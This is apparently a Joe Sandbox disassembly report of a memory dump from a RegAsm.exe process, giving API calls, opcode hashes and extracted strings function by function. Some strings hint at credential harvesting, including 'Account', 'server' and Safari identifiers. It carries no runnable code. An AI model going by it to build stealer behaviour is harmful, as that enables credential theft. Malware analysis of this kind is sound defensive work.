                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                      APIs
                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                      APIs
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc$FileModuleName
                      • String ID:
                      • API String ID: 3859505661-0
                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                      APIs
                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                      APIs
                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                      APIs
                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                      APIs
                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                      APIs
                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                      APIs
                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: EnumNamesResource
                      • String ID:
                      • API String ID: 3334572018-0
                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                      APIs
                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                      APIs
                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                      • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                      • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                      • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                      • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                      APIs
                      • memset.MSVCRT ref: 004095FC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                        • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                        • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                      • String ID:
                      • API String ID: 3655998216-0
                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                      • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                      • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                      • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                      APIs
                      • memset.MSVCRT ref: 00445426
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                      • String ID:
                      • API String ID: 1828521557-0
                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                      APIs
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • memcpy.MSVCRT ref: 00406942
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??2@FilePointermemcpy
                      • String ID:
                      • API String ID: 609303285-0
                      • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                      • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID:
                      • API String ID: 2081463915-0
                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                      APIs
                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: File$CloseCreateErrorHandleLastRead
                      • String ID:
                      • API String ID: 2136311172-0
                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                      APIs
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                      • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: ??2@??3@
                      • String ID:
                      • API String ID: 1936579350-0
                      • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                      • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                      APIs
                      • GetLastError.KERNEL32 ref: 004182D7
                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                      • LocalFree.KERNEL32(?), ref: 00418342
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                      • String ID: OsError 0x%x (%u)
                      • API String ID: 403622227-2664311388
                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                      APIs
                      • _wcsicmp.MSVCRT ref: 004022A6
                      • _wcsicmp.MSVCRT ref: 004022D7
                      • _wcsicmp.MSVCRT ref: 00402305
                      • _wcsicmp.MSVCRT ref: 00402333
                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                      • memset.MSVCRT ref: 0040265F
                      • memcpy.MSVCRT ref: 0040269B
                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      • memcpy.MSVCRT ref: 004026FF
                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.1744513977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                      Similarity
                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                      • API String ID: 577499730-1134094380
                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
